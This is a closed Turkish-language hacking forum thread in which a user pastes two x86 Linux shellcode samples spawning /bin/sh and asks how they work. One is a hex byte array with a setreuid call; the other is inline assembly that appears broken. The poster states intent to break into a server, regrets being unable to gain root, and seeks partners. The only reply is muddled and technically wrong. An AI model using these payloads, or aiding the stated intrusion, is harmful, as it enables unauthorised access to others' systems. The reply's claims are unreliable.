bakar mısınız

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
10 Tem 2009
58
0
İzmir
arkadaşlar exploitlerin çoğunun içinde shell kodu var bunları anlıyamadım
ne işe yararlar hangi mantıkla yazılırlar anlatır mısınız örnek shell kodunu vereyim de ona göre cevap edin
Kod:
__asm__ ("    __excode:    call    1f            \n"
     "    1:        mov    $23, %eax        \n"
     "            xor    %ebx, %ebx        \n"
     "            int    $0x80            \n"
     "            pop    %eax            \n"
     "            mov    $cmd-1b, %ebx        \n"
     "            add    %eax, %ebx        \n"
     "            mov    $arg-1b, %ecx        \n"
     "            add    %eax, %ecx        \n"
     "            mov    %ebx, (%ecx)        \n"
     "            mov    %ecx, %edx        \n"
     "            add    $4, %edx        \n"
     "            mov    $11, %eax        \n"
     "            mov    $1, %eax        \n"
     "    arg:        .quad    0x00, 0x00        \n"
     "    cmd:        .string        \"/bin/sh\"    \n"
     "    __excode_e:    nop                \n"
     "    .global        __excode            \n"
     "    .global        __excode_e            \n"
    );

bu da bir başkası
Kod:
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"

Craagle

Kıdemli Üye
2 Eyl 2007
4,108
0
İzmir
Exploitlerin çoğu linüx tabanlı sistemler icin yazılır
windows işledim sistemleri kullanıldığı için genelde burda shell denen olay işin içine girmişş yani windows sistemlerdede çalıştırılabilir yukarıdaki kodlar zanımca

10 Tem 2009
58
0
İzmir
hımm anladım her yere baktım bu kodlar ile ilgili belge bulamadım teşkkürler.biraz exploitler üzerinde oynamayı denicem exploitler artık root yapmıyor deli olacam 50 binlik servera girebilirim ama sorun root olamıcam ardından açık kapanacak onun için denemiyorum bile :S varsa ortak çalışacak özel mesaj atsın biraz konuşalım.yoksa tek başıma exploitler ile oynamayı denicem

10 Tem 2009
58
0
İzmir
arkadaşlar şimdi bu 2 shell kodda aynı işimi yapıyor aralarında ki fark nedir.benim bunları öğrenmem lazım hiç bir sitede yok bildiğiniz varsa beni yönlendirin lütfen ingilizce siteler olabilir tabii kide türkçeler tercihimdir

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.